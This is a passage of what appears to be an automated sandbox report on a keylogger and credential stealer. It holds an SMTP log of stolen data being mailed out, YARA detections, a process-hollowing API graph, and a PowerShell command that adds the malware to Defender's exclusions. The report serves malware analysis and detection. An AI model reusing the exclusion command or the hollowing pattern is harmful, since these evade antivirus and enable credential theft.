                                                                                                              Nov 7, 2024 12:49:30.406229973 CET58749741212.44.112.138192.168.2.12250 OK
                                                                                                              Nov 7, 2024 12:49:30.415463924 CET49741587192.168.2.12212.44.112.138RCPT TO:<straitjohn249@gmail.com>
                                                                                                              Nov 7, 2024 12:49:30.688939095 CET58749741212.44.112.138192.168.2.12250 Accepted
                                                                                                              Nov 7, 2024 12:49:30.689158916 CET49741587192.168.2.12212.44.112.138DATA
                                                                                                              Nov 7, 2024 12:49:31.224680901 CET58749741212.44.112.138192.168.2.12354 Enter message, ending with "." on a line by itself
                                                                                                              Nov 7, 2024 12:49:31.225303888 CET58749741212.44.112.138192.168.2.12354 Enter message, ending with "." on a line by itself
                                                                                                              Nov 7, 2024 12:49:31.226243973 CET49741587192.168.2.12212.44.112.138.
                                                                                                              Nov 7, 2024 12:49:31.506182909 CET58749741212.44.112.138192.168.2.12250 OK id=1t9110-0002rD-2e
                                                                                                              Nov 7, 2024 12:51:07.816234112 CET49741587192.168.2.12212.44.112.138QUIT
                                                                                                              Nov 7, 2024 12:51:08.280977011 CET58749741212.44.112.138192.168.2.12221 rcp-43.controlpanel.si closing connection

                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:06:49:05
                                                                                                              Start date:07/11/2024
                                                                                                              Path:C:\Users\user\Desktop\Nowe zam.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\Nowe zam.exe"
                                                                                                              Imagebase:0x180000
                                                                                                              File size:878'080 bytes
                                                                                                              MD5 hash:D29C5FB95585ED107D8473D204D520AE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2344766736.0000000004178000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:06:49:06
                                                                                                              Start date:07/11/2024
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nowe zam.exe"
                                                                                                              Imagebase:0x920000
                                                                                                              File size:433'152 bytes
                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:4
                                                                                                              Start time:06:49:06
                                                                                                              Start date:07/11/2024
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                              Imagebase:0x840000
                                                                                                              File size:262'432 bytes
                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4773046764.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4771168681.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.4773046764.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:5
                                                                                                              Start time:06:49:06
                                                                                                              Start date:07/11/2024
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff704000000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:243
                                                                                                                Total number of Limit Nodes:17
                                                                                                                execution_graph 38965 90d23b9 38966 90d22dc 38965->38966 38967 90d22eb 38966->38967 38971 90d3ebe 38966->38971 38992 90d3e58 38966->38992 39012 90d3e48 38966->39012 38972 90d3e4c 38971->38972 38973 90d3ec1 38971->38973 38986 90d3e7a 38972->38986 39032 90d4828 38972->39032 39037 90d454e 38972->39037 39042 90d446f 38972->39042 39047 90d4392 38972->39047 39055 90d4732 38972->39055 39060 90d4bd4 38972->39060 39064 90d4af5 38972->39064 39069 90d4635 38972->39069 39073 90d42fa 38972->39073 39081 90d485a 38972->39081 39086 90d457b 38972->39086 39091 90d445f 38972->39091 39099 90d4401 38972->39099 39104 90d4b86 38972->39104 39108 90d4367 38972->39108 39116 90d4784 38972->39116 39120 90d47e8 38972->39120 38973->38966 38986->38966 38993 90d3e72 38992->38993 38994 90d3e7a 38993->38994 38995 90d446f 2 API calls 38993->38995 38996 90d454e 2 API calls 38993->38996 38997 90d4828 2 API calls 38993->38997 38998 90d47e8 2 API calls 38993->38998 38999 90d4784 2 API calls 38993->38999 39000 90d4367 4 API calls 38993->39000 39001 90d4b86 2 API calls 38993->39001 39002 90d4401 2 API calls 38993->39002 39003 90d445f 4 API calls 38993->39003 39004 90d457b 2 API calls 38993->39004 39005 90d485a 2 API calls 38993->39005 39006 90d42fa 4 API calls 38993->39006 39007 90d4635 2 API calls 38993->39007 39008 90d4af5 2 API calls 38993->39008 39009 90d4bd4 2 API calls 38993->39009 39010 90d4732 2 API calls 38993->39010 39011 90d4392 4 API calls 38993->39011 38994->38966 38995->38994 38996->38994 38997->38994 38998->38994 38999->38994 39000->38994 39001->38994 39002->38994 39003->38994 39004->38994 39005->38994 39006->38994 39007->38994 39008->38994 39009->38994 39010->38994 39011->38994 39013 90d3e72 39012->39013 39014 90d446f 2 API calls 39013->39014 39015 90d3e7a 39013->39015 39016 90d454e 2 API calls 39013->39016 39017 90d4828 2 API calls 39013->39017 39018 90d47e8 2 API calls 39013->39018 39019 90d4784 2 API calls 39013->39019 39020 90d4367 4 API calls 39013->39020 39021 90d4b86 2 API calls 39013->39021 39022 90d4401 2 API calls 39013->39022 39023 90d445f 4 API calls 39013->39023 39024 90d457b 2 API calls 39013->39024 39025 90d485a 2 API calls 39013->39025 39026 90d42fa 4 API calls 39013->39026 39027 90d4635 2 API calls 39013->39027 39028 90d4af5 2 API calls 39013->39028 39029 90d4bd4 2 API calls 39013->39029 39030 90d4732 2 API calls 39013->39030 39031 90d4392 4 API calls 39013->39031 39014->39015 39015->38966 39016->39015 39017->39015 39018->39015 39019->39015 39020->39015 39021->39015 39022->39015 39023->39015 39024->39015 39025->39015 39026->39015 39027->39015 39028->39015 39029->39015 39030->39015 39031->39015 39033 90d46cc 39032->39033 39033->39032 39034 90d4c47 39033->39034 39125 90d1c38 39033->39125 39129 90d1c36 39033->39129 39034->39034 39038 90d4554 39037->39038 39039 90d4c1b 39038->39039 39133 90d1d28 39038->39133 39137 90d1d23 39038->39137 39043 90d448e 39042->39043 39141 90d19eb 39043->39141 39145 90d19f0 39043->39145 39044 90d488f 39044->38986 39048 90d42fb 39047->39048 39149 90d1eb8 39048->39149 39153 90d1ec0 39048->39153 39056 90d4738 39055->39056 39058 90d19eb ResumeThread 39056->39058 39059 90d19f0 ResumeThread 39056->39059 39057 90d488f 39057->38986 39058->39057 39059->39057 39062 90d1d28 ReadProcessMemory 39060->39062 39063 90d1d23 ReadProcessMemory 39060->39063 39061 90d4c1b 39062->39061 39063->39061 39065 90d46cc 39064->39065 39066 90d4c47 39065->39066 39067 90d1c38 WriteProcessMemory 39065->39067 39068 90d1c36 WriteProcessMemory 39065->39068 39067->39065 39068->39065 39071 90d1c38 WriteProcessMemory 39069->39071 39072 90d1c36 WriteProcessMemory 39069->39072 39070 90d4659 39070->38986 39071->39070 39072->39070 39074 90d42fb 39073->39074 39077 90d1eb8 CreateProcessA 39074->39077 39078 90d1ec0 CreateProcessA 39074->39078 39075 90d4da1 39075->38986 39076 90d43e2 39076->39075 39157 90d1a9c 39076->39157 39161 90d1aa0 39076->39161 39077->39076 39078->39076 39082 90d487a 39081->39082 39084 90d19eb ResumeThread 39082->39084 39085 90d19f0 ResumeThread 39082->39085 39083 90d488f 39083->38986 39084->39083 39085->39083 39088 90d4580 39086->39088 39087 90d488f 39087->38986 39088->39087 39089 90d19eb ResumeThread 39088->39089 39090 90d19f0 ResumeThread 39088->39090 39089->39087 39090->39087 39092 90d4cc5 39091->39092 39165 90d1b78 39092->39165 39169 90d1b76 39092->39169 39093 90d4d21 39093->38986 39094 90d440d 39094->39093 39095 90d1a9c Wow64SetThreadContext 39094->39095 39096 90d1aa0 Wow64SetThreadContext 39094->39096 39095->39094 39096->39094 39100 90d440d 39099->39100 39101 90d4da1 39100->39101 39102 90d1a9c Wow64SetThreadContext 39100->39102 39103 90d1aa0 Wow64SetThreadContext 39100->39103 39101->38986 39102->39100 39103->39100 39106 90d1c38 WriteProcessMemory 39104->39106 39107 90d1c36 WriteProcessMemory 39104->39107 39105 90d4bb4 39106->39105 39107->39105 39109 90d42a8 39108->39109 39110 90d42fa 39108->39110 39109->38986 39112 90d1eb8 CreateProcessA 39110->39112 39113 90d1ec0 CreateProcessA 39110->39113 39111 90d43e2 39111->39109 39114 90d1a9c Wow64SetThreadContext 39111->39114 39115 90d1aa0 Wow64SetThreadContext 39111->39115 39112->39111 39113->39111 39114->39111 39115->39111 39118 90d1a9c Wow64SetThreadContext 39116->39118 39119 90d1aa0 Wow64SetThreadContext 39116->39119 39117 90d479e 39118->39117 39119->39117 39121 90d440d 39120->39121 39122 90d4da1 39121->39122 39123 90d1a9c Wow64SetThreadContext 39121->39123 39124 90d1aa0 Wow64SetThreadContext 39121->39124 39122->38986 39123->39121 39124->39121 39126 90d1c80 WriteProcessMemory 39125->39126 39128 90d1cd7 39126->39128 39128->39033 39130 90d1c80 WriteProcessMemory 39129->39130 39132 90d1cd7 39130->39132 39132->39033 39134 90d1d73 ReadProcessMemory 39133->39134 39136 90d1db7 39134->39136 39136->39039 39138 90d1d73 ReadProcessMemory 39137->39138 39140 90d1db7 39138->39140 39140->39039 39142 90d19f0 ResumeThread 39141->39142 39144 90d1a61 39142->39144 39144->39044 39146 90d1a30 ResumeThread 39145->39146 39148 90d1a61 39146->39148 39148->39044 39150 90d1f49 CreateProcessA 39149->39150 39152 90d210b 39150->39152 39152->39152 39154 90d1f49 CreateProcessA 39153->39154 39156 90d210b 39154->39156 39156->39156 39158 90d1ae5 Wow64SetThreadContext 39157->39158 39160 90d1b2d 39158->39160 39160->39076 39162 90d1ae5 Wow64SetThreadContext 39161->39162 39164 90d1b2d 39162->39164 39164->39076 39166 90d1bb8 VirtualAllocEx 39165->39166 39168 90d1bf5 39166->39168 39168->39094 39170 90d1bb8 VirtualAllocEx 39169->39170 39172 90d1bf5 39170->39172 39172->39094 39173 90d23f9 39175 90d22dc 39173->39175 39174 90d22eb 39175->39174 39176 90d3ebe 12 API calls 39175->39176 39177 90d3e48 12 API calls 39175->39177 39178 90d3e58 12 API calls 39175->39178 39176->39175 39177->39175 39178->39175 38950 90d5088 38951 90d5213 38950->38951 38953 90d50ae 38950->38953 38953->38951 38954 90d3538 38953->38954 38955 90d5308 PostMessageW 38954->38955 38956 90d5374 38955->38956 38956->38953 38957 97ac48 38958 97ac57 38957->38958 38960 97b138 38957->38960 38961 97b17c 38960->38961 38962 97b159 38960->38962 38961->38958 38962->38961 38963 97b380 GetModuleHandleW 38962->38963 38964 97b3ad 38963->38964 38964->38958 39179 974668 39180 974672 39179->39180 39184 974759 39179->39184 39189 973e40 39180->39189 39182 97468d 39185 97477d 39184->39185 39193 974858 39185->39193 39197 974868 39185->39197 39190 973e4b 39189->39190 39205 975c74 39190->39205 39192 976fb0 39192->39182 39195 97488f 39193->39195 39194 97496c 39194->39194 39195->39194 39201 9744c4 39195->39201 39199 97488f 39197->39199 39198 97496c 39198->39198 39199->39198 39200 9744c4 CreateActCtxA 39199->39200 39200->39198 39202 9758f8 CreateActCtxA 39201->39202 39204 9759bb 39202->39204 39206 975c7f 39205->39206 39209 975cc4 39206->39209 39208 97708d 39208->39192 39210 975ccf 39209->39210 39213 975cf4 39210->39213 39212 977162 39212->39208 39214 975cff 39213->39214 39217 975d24 39214->39217 39216 977265 39216->39212 39218 975d2f 39217->39218 39219 9785a9 39218->39219 39222 97cd10 39218->39222 39228 97cd00 39218->39228 39219->39216 39223 97cd31 39222->39223 39224 97cd55 39223->39224 39234 97cfd0 39223->39234 39238 97d0e9 39223->39238 39244 97cfe0 39223->39244 39224->39219 39229 97cd31 39228->39229 39230 97cd55 39229->39230 39231 97cfd0 DuplicateHandle 39229->39231 39232 97cfe0 DuplicateHandle 39229->39232 39233 97d0e9 DuplicateHandle 39229->39233 39230->39219 39231->39230 39232->39230 39233->39230 39235 97cfed 39234->39235 39237 97d027 39235->39237 39248 97b060 39235->39248 39237->39224 39239 97d03f 39238->39239 39240 97d0f2 39238->39240 39239->39224 39256 97d2d8 39240->39256 39259 97d2c8 39240->39259 39241 97d22b 39241->39224 39245 97cfed 39244->39245 39246 97d027 39245->39246 39247 97b060 DuplicateHandle 39245->39247 39246->39224 39247->39246 39249 97b06b 39248->39249 39251 97dd40 39249->39251 39252 97d38c 39249->39252 39251->39251 39253 97d397 39252->39253 39254 975d24 DuplicateHandle 39253->39254 39255 97ddaf 39254->39255 39255->39251 39262 97b128 39256->39262 39260 97b128 DuplicateHandle 39259->39260 39261 97d306 39259->39261 39260->39261 39261->39241 39263 97d748 DuplicateHandle 39262->39263 39264 97d306 39263->39264 39264->39241
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2346557474.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b10000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1b63fb363dd53074149c644efa04373808b3aae5e9fe23ede4d93bce0ac968a7
                                                                                                                • Instruction ID: b8d4fd41bb19019fd449308ac772baba86bad1c4d6030a44a1a7d270158d879d
                                                                                                                • Opcode Fuzzy Hash: 1b63fb363dd53074149c644efa04373808b3aae5e9fe23ede4d93bce0ac968a7
                                                                                                                • Instruction Fuzzy Hash: B442F634701610CFDB29AF78C55866A7BE2FF89305B5444AEE90ADB360DE36EC42CB51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 892cb3b9a337dc0c5f0e848b9a6c2597a2ce6a80d32b2d239ff45dd907b53fe1
                                                                                                                • Instruction ID: b03b0bffa67550f9fbbbb8ab3f4c641e69b8d81a25c82528a6fcb5dbb365c033
                                                                                                                • Opcode Fuzzy Hash: 892cb3b9a337dc0c5f0e848b9a6c2597a2ce6a80d32b2d239ff45dd907b53fe1
                                                                                                                • Instruction Fuzzy Hash: FEC1AE32B027008FEB29DB75C8507AEB7F6AFC9701F14886DE5498B295DB35E901CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b9115246461b00590a2b240596f21e19023ad7d4b48dccae2f9c0954d65a1aba
                                                                                                                • Instruction ID: d195d1016e3b42ba62e7f6b32b94bd3fa709222e30f29d19a2f91a63433ce97b
                                                                                                                • Opcode Fuzzy Hash: b9115246461b00590a2b240596f21e19023ad7d4b48dccae2f9c0954d65a1aba
                                                                                                                • Instruction Fuzzy Hash: 3B518F75E016199FDF14CFEAD9446EEBBB2FF88300F10C12AE919AB254D7345A46CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 78638108d37eca7e04bc309fa86134dfc7baf7c5cb1b5b41fe1f13f94e543922
                                                                                                                • Instruction ID: 8975d4985453f0e6e705585f2a7abaf3c3a05280be34820c0990ea2498cc4e3b
                                                                                                                • Opcode Fuzzy Hash: 78638108d37eca7e04bc309fa86134dfc7baf7c5cb1b5b41fe1f13f94e543922
                                                                                                                • Instruction Fuzzy Hash: B7412974E0D2088FEB08CFAAE4456EEBBF6BF8E301F18D06AE519A7651D7345941CB50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2347126493.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_50f0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e857d9153a92cc590f26901b2652cfeb1dc23d21fea40f66efbc4cf25a0dabd
                                                                                                                • Instruction ID: 01a6294a0a1793dbce322c5fe874c05dd0b2fd3296c9daecae532bb7035251aa
                                                                                                                • Opcode Fuzzy Hash: 0e857d9153a92cc590f26901b2652cfeb1dc23d21fea40f66efbc4cf25a0dabd
                                                                                                                • Instruction Fuzzy Hash: 69419371E006199FEB08CFEAD9846EEFBF6AF88300F14C02AD519AB254D7345946CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 731baaae7c90bbf1835934776eadc09abf6266c26912934e9cb97f9d13e27d46
                                                                                                                • Instruction ID: 8a65c1cef02954c0c15754095d38336f5578e3d716bfe74414164f4d02b61d3b
                                                                                                                • Opcode Fuzzy Hash: 731baaae7c90bbf1835934776eadc09abf6266c26912934e9cb97f9d13e27d46
                                                                                                                • Instruction Fuzzy Hash: 88D0E23488F308CBCB108FA8C0855FCBBB8AB0A390F002964D40EA32A2CB30C9858E00

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 90d1eb8-90d1f55 2 90d1f8e-90d1fae 0->2 3 90d1f57-90d1f61 0->3 8 90d1fe7-90d2016 2->8 9 90d1fb0-90d1fba 2->9 3->2 4 90d1f63-90d1f65 3->4 6 90d1f88-90d1f8b 4->6 7 90d1f67-90d1f71 4->7 6->2 10 90d1f75-90d1f84 7->10 11 90d1f73 7->11 17 90d204f-90d2109 CreateProcessA 8->17 18 90d2018-90d2022 8->18 9->8 13 90d1fbc-90d1fbe 9->13 10->10 12 90d1f86 10->12 11->10 12->6 14 90d1fe1-90d1fe4 13->14 15 90d1fc0-90d1fca 13->15 14->8 19 90d1fcc 15->19 20 90d1fce-90d1fdd 15->20 31 90d210b-90d2111 17->31 32 90d2112-90d2198 17->32 18->17 21 90d2024-90d2026 18->21 19->20 20->20 22 90d1fdf 20->22 23 90d2049-90d204c 21->23 24 90d2028-90d2032 21->24 22->14 23->17 26 90d2034 24->26 27 90d2036-90d2045 24->27 26->27 27->27 28 90d2047 27->28 28->23 31->32 42 90d21a8-90d21ac 32->42 43 90d219a-90d219e 32->43 45 90d21bc-90d21c0 42->45 46 90d21ae-90d21b2 42->46 43->42 44 90d21a0 43->44 44->42 48 90d21d0-90d21d4 45->48 49 90d21c2-90d21c6 45->49 46->45 47 90d21b4 46->47 47->45 51 90d21e6-90d21ed 48->51 52 90d21d6-90d21dc 48->52 49->48 50 90d21c8 49->50 50->48 53 90d21ef-90d21fe 51->53 54 90d2204 51->54 52->51 53->54 56 90d2205 54->56 56->56
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090D20F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 5055062ebf987902f198a0614d220c947fc9f529e92a797f3c6dd63be1b18f4f
                                                                                                                • Instruction ID: 08666561c6c9aff18e36ce9c209ecdc53ae8a9cbb4449232603eb9a25995158a
                                                                                                                • Opcode Fuzzy Hash: 5055062ebf987902f198a0614d220c947fc9f529e92a797f3c6dd63be1b18f4f
                                                                                                                • Instruction Fuzzy Hash: 6A915971D01319DFEB54DFA8C841BDDBBB2BF48310F1489AAE818A7250DB749985CF91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 57 90d1ec0-90d1f55 59 90d1f8e-90d1fae 57->59 60 90d1f57-90d1f61 57->60 65 90d1fe7-90d2016 59->65 66 90d1fb0-90d1fba 59->66 60->59 61 90d1f63-90d1f65 60->61 63 90d1f88-90d1f8b 61->63 64 90d1f67-90d1f71 61->64 63->59 67 90d1f75-90d1f84 64->67 68 90d1f73 64->68 74 90d204f-90d2109 CreateProcessA 65->74 75 90d2018-90d2022 65->75 66->65 70 90d1fbc-90d1fbe 66->70 67->67 69 90d1f86 67->69 68->67 69->63 71 90d1fe1-90d1fe4 70->71 72 90d1fc0-90d1fca 70->72 71->65 76 90d1fcc 72->76 77 90d1fce-90d1fdd 72->77 88 90d210b-90d2111 74->88 89 90d2112-90d2198 74->89 75->74 78 90d2024-90d2026 75->78 76->77 77->77 79 90d1fdf 77->79 80 90d2049-90d204c 78->80 81 90d2028-90d2032 78->81 79->71 80->74 83 90d2034 81->83 84 90d2036-90d2045 81->84 83->84 84->84 85 90d2047 84->85 85->80 88->89 99 90d21a8-90d21ac 89->99 100 90d219a-90d219e 89->100 102 90d21bc-90d21c0 99->102 103 90d21ae-90d21b2 99->103 100->99 101 90d21a0 100->101 101->99 105 90d21d0-90d21d4 102->105 106 90d21c2-90d21c6 102->106 103->102 104 90d21b4 103->104 104->102 108 90d21e6-90d21ed 105->108 109 90d21d6-90d21dc 105->109 106->105 107 90d21c8 106->107 107->105 110 90d21ef-90d21fe 108->110 111 90d2204 108->111 109->108 110->111 113 90d2205 111->113 113->113
                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 090D20F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2348023019.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_90d0000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 8c307c36cc5b88a4a4e4b366140fe0d5f2489b36629fa5602fd1a71cb08dfd96
                                                                                                                • Instruction ID: 20db890c06e2bfa722de36e39446cc64279beb9292987209f6c23d5497decbeb
                                                                                                                • Opcode Fuzzy Hash: 8c307c36cc5b88a4a4e4b366140fe0d5f2489b36629fa5602fd1a71cb08dfd96
                                                                                                                • Instruction Fuzzy Hash: A5914971D01319DFEB64DFA8C841BEDBBB2BF48310F1485AAE818A7250DB749985CF91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 114 97b138-97b157 115 97b183-97b187 114->115 116 97b159-97b166 call 979cbc 114->116 118 97b19b-97b1dc 115->118 119 97b189-97b193 115->119 122 97b17c 116->122 123 97b168 116->123 125 97b1de-97b1e6 118->125 126 97b1e9-97b1f7 118->126 119->118 122->115 169 97b16e call 97b3d0 123->169 170 97b16e call 97b3e0 123->170 125->126 127 97b21b-97b21d 126->127 128 97b1f9-97b1fe 126->128 133 97b220-97b227 127->133 130 97b200-97b207 call 979cc8 128->130 131 97b209 128->131 129 97b174-97b176 129->122 132 97b2b8-97b378 129->132 135 97b20b-97b219 130->135 131->135 164 97b380-97b3ab GetModuleHandleW 132->164 165 97b37a-97b37d 132->165 136 97b234-97b23b 133->136 137 97b229-97b231 133->137 135->133 140 97b23d-97b245 136->140 141 97b248-97b251 call 979cd8 136->141 137->136 140->141 145 97b253-97b25b 141->145 146 97b25e-97b263 141->146 145->146 147 97b265-97b26c 146->147 148 97b281-97b28e 146->148 147->148 150 97b26e-97b27e call 979ce8 call 97ad34 147->150 155 97b2b1-97b2b7 148->155 156 97b290-97b2ae 148->156 150->148 156->155 166 97b3b4-97b3c8 164->166 167 97b3ad-97b3b3 164->167 165->164 167->166 169->129 170->129
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0097B39E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_970000_Nowe zam.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 4e34eef4d914e2cd8ea508a4a254feeeaa7f04f326b4f83aaffdcb0cd71aa67e
                                                                                                                • Instruction ID: b03e227a3d50e2544b98e7298b1cd98cf75a7a28567f97b45d336e6c4a5976e9
                                                                                                                • Opcode Fuzzy Hash: 4e34eef4d914e2cd8ea508a4a254feeeaa7f04f326b4f83aaffdcb0cd71aa67e
                                                                                                                • Instruction Fuzzy Hash: 6B818671A01B058FDB24CF29C45579ABBF5FF88300F008A2DE49ADBA51D735E80ACB90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 171 9758ec-9759b9 CreateActCtxA 173 9759c2-975a1c 171->173 174 9759bb-9759c1 171->174 181 975a1e-975a21 173->181 182 975a2b-975a2f 173->182 174->173 181->182 183 975a31-975a3d 182->183 184 975a40 182->184 183->184 186 975a41 184->186 186->186
                                                                                                                APIs
                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 009759A9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2342810574.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
